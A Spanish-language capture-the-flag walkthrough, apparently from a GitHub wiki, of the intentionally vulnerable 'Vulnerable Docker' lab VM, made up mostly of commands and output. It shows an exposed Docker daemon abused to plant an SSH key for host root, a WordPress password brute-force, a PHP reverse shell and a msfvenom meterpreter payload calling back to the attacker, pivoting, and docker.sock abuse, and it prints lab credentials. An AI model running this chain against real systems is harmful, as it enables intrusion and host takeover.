Docker notsosecure.com - danielcastropalomares/security GitHub Wiki
Ever fantasized about playing with docker misconfigurations, privilege escalation, etc. within a container?
Download this VM, pull out your pentest hats and get started 🙂
We have 2 Modes:
HARD: This would require you to combine your docker skills as well as your pen-testing skills to achieve host compromise. EASY: Relatively easier path, knowing docker would be enough to compromise the machine and gain root on the host machines. We have planted 3 flag files across the various machines / systems that are available to you. Your mission if you choose to accept would be as following:
-
Identify all the flags (2 in total: flag_1 and flag_3) (flag_2 was inadvertently left out)
-
Gain id=0 shell access on the host machine.
Con un primer escaneo vemos que el puerto 2375 se encuentra abierto, que es el daemon de docker:
root@kali:~# nmap -p- 172.31.255.115
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-04-05 12:19 CEST
Nmap scan report for 172.31.255.115
Host is up (0.000098s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
2375/tcp open docker
8000/tcp open http-alt
MAC Address: 08:00:27:D9:C7:82 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 6.88 seconds
root@kali:~#
A nivel de web esta escuchando por el puerto 8000 y parece que es un wordpress:
root@kali:~# nmap -A 172.31.255.115
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-04-05 12:19 CEST
Nmap scan report for 172.31.255.115
Host is up (0.00042s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
8000/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.1
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: NotSoEasy Docker – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
MAC Address: 08:00:27:D9:C7:82 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 172.31.255.115
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.86 seconds
Listamos lo containers levantados:
docker -H=172.31.255.115:2375 ps
Nos conectamos al wordpress:
docker -H=172.31.255.115:2375 exec -it content_wordpress_1 /bin/bash
root@8f4bca8ef241:/var/www/html#
Conseguimos las credenciales de la BDD:
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'wordpress');
/** MySQL database password */
define('DB_PASSWORD', 'WordPressISBest');
/** MySQL hostname */
define('DB_HOST', 'db:3306');
No encontramos ninguna flag dentro del docker de wordpress:
root@8f4bca8ef241:~# find / -name flag* | grep -v sys
Nos conectamos al container de la BDD:
docker -H=172.31.255.115:2375 exec -it content_db_1 /bin/bash
mysql -u wordpress -p wordpress
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+----------------------------+----------+---------------------+---------------------
+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key
| user_status | display_name |
+----+------------+------------------------------------+---------------+----------------------------+----------+---------------------+---------------------
+-------------+--------------+
| 1 | bob | $P$B0VtNkHE4cR4TTnEMypX1XyR3tu3z1. | bob | [email protected] | | 2017-08-19 04:35:41 |
| 0 | bob |
+----+------------+------------------------------------+---------------+----------------------------+----------+---------------------+---------------------
+-------------+--------------+
1 row in set (0.00 sec)
Creamos un nuevo container y mapeamos el directorio root al del container:
docker -H=172.31.255.115:2375 run -itd -v /root:/root alpine /bin/sh
En el directorio ssh:
~ # cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpT+U/LoYIzigCo5HFQR1vzSCXwQciu/pGPDpfj46v4aP6GYwel2jGn0waWViSzVk99CXVXneO0akbwLIyrrXluAcvng6f5vjRWPM46DGibV06ypAI6Y0neRC+oSF2b4D1mizcSlbGqJYNr00YcKETDNr8QFQt0eFS8KmwovtP5pkg3GiotOIbWEFOeQ8V6N/ShNl5wuRuMosESlP+RpzgawSE7KcoTzAJ6LqmUR4wWeW1XfLMaGD6Z4QIkofNyghlQ/SsNDYweSuztM2kqdtVDsEPNCiLgVCQsAWaBiL6sTSWf2ywJtiRocOg6BHy8IymljltOjyQf8g+ky2CLaGx [email protected]
Añadimos nuestra key ssh:
root@kali:~# cat test2.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVJZeFL8s25vndmwu3tahDcRXLuRm3DCpSER0x10bK3SIa53CZ319n2h/vKOBHvELdTvxyWf4VOQUUydkF7SJSHzvMaT94TBMqcM2noOfe0DZiU6QefyQr22Nvop+AOaNd/EXjqBwIjMUQoNWPpPygJ3Vq3xzcU9+QSg1FexYrEo5gmDYMbH0zgaZlAWhHSdYhSWVGCjrc7s5tfESqtqwXb4K96Xb4lK2SfmVnWot0zOrndjE4ckUYcoWMogB22KCKltsBiwscpSy6dpOEJOFsDF1urWerUV4N0uU3POtNI7DE1m+aAp/FIMsd9du3puvS2adcBCBeh9FGDn3IYUmT root@kali
~/.ssh # echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVJZeFL8s25vndmwu3tahDcRXLuRm3DCpSER0x10bK3SIa53CZ319n2h/vKOBHvELdTvxyWf4VOQUUydkF7SJSHzvMaT94TBMqcM2n
oOfe0DZiU6QefyQr22Nvop+AOaNd/EXjqBwIjMUQoNWPpPygJ3Vq3xzcU9+QSg1FexYrEo5gmDYMbH0zgaZlAWhHSdYhSWVGCjrc7s5tfESqtqwXb4K96Xb4lK2SfmVnWot0zOrndjE4ckUYcoWMogB22KC
KltsBiwscpSy6dpOEJOFsDF1urWerUV4N0uU3POtNI7DE1m+aAp/FIMsd9du3puvS2adcBCBeh9FGDn3IYUmT root@kali" >> authorized_keys
Nos conectamos por ssh:
root@kali:~# ssh -i test2 [email protected]
The authenticity of host '172.31.255.115 (172.31.255.115)' can't be established.
ECDSA key fingerprint is SHA256:iMM5I1uQqleM9fe/JBCQcZp73GOjgDxxR/EB4Gwf1QI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.31.255.115' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com/
System information as of Fri Apr 5 11:16:29 BST 2019
System load: 0.0 Memory usage: 5% Processes: 74
Usage of /: 25.3% of 8.73GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
https://landscape.canonical.com/
Last login: Tue Aug 22 15:17:15 2017 from 192.168.0.101
root@vulndocker:~#
Buscamos la flag:
root@vulndocker:~# find / -name flag* | grep -v sys
/usr/src/linux-headers-3.13.0-128-generic/include/config/zone/dma/flag.h
/usr/src/linux-headers-3.13.0-128/scripts/coccinelle/locks/flags.cocci
/flag_3
root@vulndocker:~# cat /flag_3
d867a73c70770e73b65e6949dd074285dfdee80a8db333a7528390f6
Awesome so you reached host
Well done
Now the bigger challenge try to understand and fix the bugs.
If you want more attack targets look at the shadow file and try cracking passwords :P
Thanks for playing the challenges we hope you enjoyed all levels
You can send your suggestions bricks bats criticism or appreciations
on [email protected]
root@vulndocker:~#
El puerto de docker ya no se encuentra abierto:
root@kali:~# nmap -p- 172.31.255.115
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-04-05 14:09 CEST
Nmap scan report for 172.31.255.115
Host is up (0.00012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
8000/tcp open http-alt
MAC Address: 08:00:27:D9:C7:82 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 4.52 seconds
root@kali:~# nmap -A 172.31.255.115
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-04-05 14:09 CEST
Nmap scan report for 172.31.255.115
Host is up (0.00057s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
8000/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.9
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: NotSoEasy Docker – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
MAC Address: 08:00:27:D9:C7:82 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.57 ms 172.31.255.115
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds
A nivel de nikto no encontramos nada:
root@kali:~# nikto -C all --host 172.31.255.115:8000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.115
+ Target Hostname: 172.31.255.115
+ Target Port: 8000
+ Start Time: 2019-04-05 14:10:19 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Retrieved x-powered-by header: PHP/5.6.31
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://172.31.255.115/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
Con wpscan encontramos el usuario bob:
root@kali:~# wpscan --url http://172.31.255.115:8000 --force -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.4.0
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://172.31.255.115:8000/
[+] Started: Fri Apr 5 14:14:11 2019
Interesting Finding(s):
[+] http://172.31.255.115:8000/
| Interesting Entries:
| - Server: Apache/2.4.10 (Debian)
| - X-Powered-By: PHP/5.6.31
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://172.31.255.115:8000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] http://172.31.255.115:8000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://172.31.255.115:8000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.8.9 identified (Latest, released on 2019-03-13).
| Detected By: Rss Generator (Passive Detection)
| - http://172.31.255.115:8000/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
| - http://172.31.255.115:8000/comments/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://172.31.255.115:8000/wp-content/themes/twentyseventeen/
| Last Updated: 2019-02-21T00:00:00.000Z
| Readme: http://172.31.255.115:8000/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://172.31.255.115:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.9
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://172.31.255.115:8000/wp-content/themes/twentyseventeen/style.css?ver=4.8.9, Match: 'Version: 1.3'
[+] Enumerating Most Popular Plugins
[i] No plugins Found.
[+] Enumerating Users
Brute Forcing Author IDs - Time: 00:00:00 <=============================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] bob
| Detected By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://172.31.255.115:8000/wp-json/wp/v2/users/
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+]
| Detected By: Rss Generator (Passive Detection)
| Confirmed By: Rss Generator (Aggressive Detection)
[+] Finished: Fri Apr 5 14:14:15 2019
[+] Requests Done: 58
[+] Cached Requests: 16
[+] Data Sent: 11.673 KB
[+] Data Received: 2.254 MB
[+] Memory used: 87.512 MB
[+] Elapsed time: 00:00:04
Lanzamos ataque de fuerza bruta con el usuario bob encontrado anteriormente, despues de 25 minutos encontramos un password:
root@kali:~# wpscan --url http://172.31.255.115:8000 -U /tmp/users.txt -P /usr/share/wordlists/rockyou.txt
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - bob / Welcome1
Trying bob / Welcome1 Time: 00:25:40 <=============================================================================> (40400 / 40400) 100.00% Time: 00:25:40
Vamos a subir una reverse shell:
cd /tmp
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xvzf php-reverse-shell-1.0.tar.gz
cd php-reverse-shell-1.0
Editamos el fichero del php y configuramos nuestra IP y el puerto:
$ip = '172.31.255.129'; // CHANGE THIS
$port = 8085; // CHANGE THIS
Ponemos a escuchar un servidor de netcat:
root@kali:/usr/local/src/Osmedeus# nc -vlp 8085
listening on [any] 8085 ...
Ahora desde la web de wordpress editamos el archivo 404.php y pegamos la shell anterior:
Appareance > Editor > 404 template.php
Ahora accedemos a la url:
http://172.31.255.115:8000/wp-content/themes/twentyseventeen/404.php
Y nos aparecerá la shell del netcat:
root@kali:/usr/local/src/Osmedeus# nc -vlp 8085
listening on [any] 8085 ...
172.31.255.115: inverse host lookup failed: Unknown host
connect to [172.31.255.129] from (UNKNOWN) [172.31.255.115] 40026
Linux 8f4bca8ef241 3.13.0-128-generic #177-Ubuntu SMP Tue Aug 8 11:40:23 UTC 2017 x86_64 GNU/Linux
13:28:36 up 1:20, 0 users, load average: 0.00, 2.54, 13.38
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ $ $ $
$
$
$
Ya estamos conectados a nivel de docker:
$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.5 315068 5252 ? Ss 12:08 0:00 apache2 -DFOREGROUND
www-data 207 0.9 3.7 398472 37736 ? S 12:59 0:20 apache2 -DFOREGROUND
www-data 217 0.9 2.4 320680 24876 ? S 12:59 0:19 apache2 -DFOREGROUND
www-data 218 0.9 2.4 321180 25228 ? S 13:00 0:19 apache2 -DFOREGROUND
www-data 225 0.7 2.5 320676 25968 ? S 13:03 0:14 apache2 -DFOREGROUND
www-data 234 0.6 2.4 320672 24712 ? S 13:05 0:10 apache2 -DFOREGROUND
www-data 245 0.6 3.5 397484 35748 ? S 13:05 0:11 apache2 -DFOREGROUND
www-data 268 0.6 2.4 320668 24812 ? S 13:05 0:10 apache2 -DFOREGROUND
www-data 316 0.6 2.4 320700 24772 ? S 13:05 0:10 apache2 -DFOREGROUND
www-data 331 0.5 2.5 321268 25692 ? S 13:10 0:07 apache2 -DFOREGROUND
www-data 339 0.0 1.9 318060 19992 ? S 13:22 0:00 apache2 -DFOREGROUND
www-data 341 0.0 0.0 4328 656 ? S 13:28 0:00 sh -c uname -a; w; id; /bin/sh -i
www-data 345 0.0 0.0 4328 660 ? S 13:28 0:00 /bin/sh -i
www-data 351 0.0 0.1 17492 1156 ? R 13:35 0:00 ps aux
$
Conseguimos las credenciales de acceso a la BDD:
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'wordpress');
/** MySQL database password */
define('DB_PASSWORD', 'WordPressISBest');
/** MySQL hostname */
define('DB_HOST', 'db:3306');
A nivel de binarios con SUID:
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chfn
/bin/umount
/bin/mount
/bin/ping
/bin/ping6
/bin/su
a nivel de puertos:
$ ss -4nlt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 127.0.0.11:36198 *:*
LISTEN 0 128 *:80 *:*
A nivel de cron no encontramos nada.
$ ls -liath /etc/cron*
total 36K
14 drwxr-xr-x 70 root root 4.0K Aug 22 2017 ..
329 drwxr-xr-x 2 root root 4.0K Aug 3 2017 .
562 -rwxr-xr-x 1 root root 625 Jul 18 2017 apache2
563 -rwxr-xr-x 1 root root 249 May 17 2017 passwd
564 -rwxr-xr-x 1 root root 15K Dec 11 2016 apt
565 -rwxr-xr-x 1 root root 1.6K May 2 2016 dpkg
A nivel de kernel parece que es vulnerable:
$ uname -a
Linux 8f4bca8ef241 3.13.0-128-generic #177-Ubuntu SMP Tue Aug 8 11:40:23 UTC 2017 x86_64 GNU/Linux
Creamos un payload :
msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf --platform linux -e generic/none LHOST=172.31.255.129 LPORT=5555 > '/tmp/payload-5555.elf'
Ponemos a escuchar metasploit:
msf exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
msf exploit(multi/handler) > set LHOST 172.31.255.129
msf exploit(multi/handler) > set LPORT 5555
exploit
Lo ejecutamos en la máquina remota y veremos aparecer la nueva sesión:
$ ./payload-5555.elf
Kali:
[*] Meterpreter session 4 opened (172.31.255.129:5555 -> 172.31.255.115:51015) at 2019-04-09 17:36:53 +0200
Lo dejamos en background:
meterpreter > background
[*] Backgrounding session 2...
Enrutamos el tráfico hacia la sesion 2:
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/linux uid=33, gid=33, euid=33, egid=33 @ 172.18.0.3 172.31.255.129:5555 -> 172.31.255.115:42798 (172.18.0.3)
msf exploit(multi/handler) >
msf exploit(multi/handler) >
msf exploit(multi/handler) > use post/multi/manage/autoroute
msf post(multi/manage/autoroute) > set session 2
session => 2
msf post(multi/manage/autoroute) > exploit
[!] SESSION may not be compatible with this module.
[*] Running module against 172.18.0.3
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.18.0.0/255.255.0.0 from host's routing table.
[*] Post module execution completed
Lanzamos un ping para encontrar mas maquinas:
msf post(multi/manage/autoroute) > use post/multi/gather/ping_sweep
msf post(multi/gather/ping_sweep) > set rhosts 172.18.0.0-255
rhosts => 172.18.0.0-255
msf post(multi/gather/ping_sweep) > set session 2
session => 2
msf post(multi/gather/ping_sweep) > exploit
[*] Performing ping sweep for IP range 172.18.0.0-255
[+] 172.18.0.3 host found
[+] 172.18.0.2 host found
[+] 172.18.0.1 host found
[+] 172.18.0.4 host found
Escaneamos con portscan:
msf post(multi/gather/ping_sweep) > use auxiliary/scanner/portscan/tcp
msf auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.0-4
rhosts => 172.18.0.0-4
msf auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf auxiliary(scanner/portscan/tcp) > exploit
[+] 172.18.0.1: - 172.18.0.1:22 - TCP OPEN
[+] 172.18.0.4: - 172.18.0.4:22 - TCP OPEN
[+] 172.18.0.3: - 172.18.0.3:80 - TCP OPEN
[+] 172.18.0.2: - 172.18.0.2:3306 - TCP OPEN
[+] 172.18.0.3: - 172.18.0.3:5555 - TCP OPEN
[*] Scanned 5 of 5 hosts (100% complete)
[*] Auxiliary module execution completed
Si ampliamos el rango de puertos, vemos que la maquina 0.4 tiene abiertos también el 8022:
msf auxiliary(scanner/portscan/tcp) > set PORTS 1-32000
PORTS => 1-32000
msf auxiliary(scanner/portscan/tcp) > exploit
[+] 172.18.0.4: - 172.18.0.4:22 - TCP OPEN
[+] 172.18.0.4: - 172.18.0.4:8022 - TCP OPEN
Creamos una redirección de puertos para poder llegar al puerto 8022:
sessions 2
portfwd add -l 8022 -p 8022 -r 172.18.0.4
background
Y ahora si lanzamos un nmap a dicho puerto vemos que es un servidor web
root@kali:/tmp# nmap -A -p 8022 localhost
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-04-09 18:01 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000097s latency).
PORT STATE SERVICE VERSION
8022/tcp open http Node.js Express framework
|_http-title: Docker-SSH
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.10
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.79 seconds
Si nos conectamos vía web vemos aparecer una shell:
Connection established
###############################################################
## Docker SSH ~ Because every container should be accessible ##
###############################################################
## container | content_db_1 ##
###############################################################
/ $
La shell en cuestión tiene acceso como root:
/ $ id
uid=0(root) gid=0(root) groups=0(root)
Si revisamos las variables del container encontramos las credenciales del usuario root para acceder a la BDD:
/ $ export
declare -x GOSU_VERSION="1.7"
declare -x HOME="/root"
declare -x HOSTNAME="13f0a3bb2706"
declare -x MYSQL_DATABASE="wordpress"
declare -x MYSQL_MAJOR="5.7"
declare -x MYSQL_PASSWORD="WordPressISBest"
declare -x MYSQL_ROOT_PASSWORD="Peaches123"
declare -x MYSQL_USER="wordpress"
declare -x MYSQL_VERSION="5.7.19-1debian8"
declare -x OLDPWD
declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
declare -x PS1="\\w \$ "
declare -x PWD="/"
declare -x SHLVL="1"
declare -x TERM="linux"
declare -x affinity:container
A nivel de procesos tiene escuchando un servidor mysql:
ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
mysql 1 0.0 20.1 1131604 204628 ? Ssl 19:49 0:05 mysqld
Nos hemos conectado contra la IP 0.4 por el puerto 8022, pero una vez dentro de la shell vemos que es la IP 0.2 que es la BDD:
/ $ ip ad
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
5: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.2/16 scope global eth0
valid_lft forever preferred_lft forever
En la documentación del docker-ssh, vemos que para levantar el container mapea el docker.sock:
https://hub.docker.com/r/jeroenpeeters/docker-ssh/
$ docker run -d -p 2222:22 \
-v /var/run/docker.sock:/var/run/docker.sock \
-e FILTERS={\"name\":[\"^/my-container$\"]} -e AUTH_MECHANISM=noAuth \
jeroenpeeters/docker-ssh
Así que dentro de la consola SSH que tenemos abierta por el puerto 8022, vamos a instalar docker-ce:
echo "deb https://download.docker.com/linux/debian jessie stable" >> /etc/apt/sources.list
apt-get install apt-transport-https
apt-get update
apt-get install docker-ce
Ahora docker-ce utiliza el socket "/var/run/docker.sock" que tenemos mapeado desde el container docker-ssh, ahora tendremos control total del daemon del docker server:
/ $ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
8f4bca8ef241 wordpress:latest "docker-entrypoint.s…" 19 months ago Up 8 hours 0.0.0.0:8000->80/tcp content_wordpress_1
13f0a3bb2706 mysql:5.7 "docker-entrypoint.s…" 19 months ago Up 8 hours 3306/tcp content_db_1
b90babce1037 jeroenpeeters/docker-ssh "npm start" 20 months ago Up 8 hours 22/tcp, 8022/tcp content_ssh_1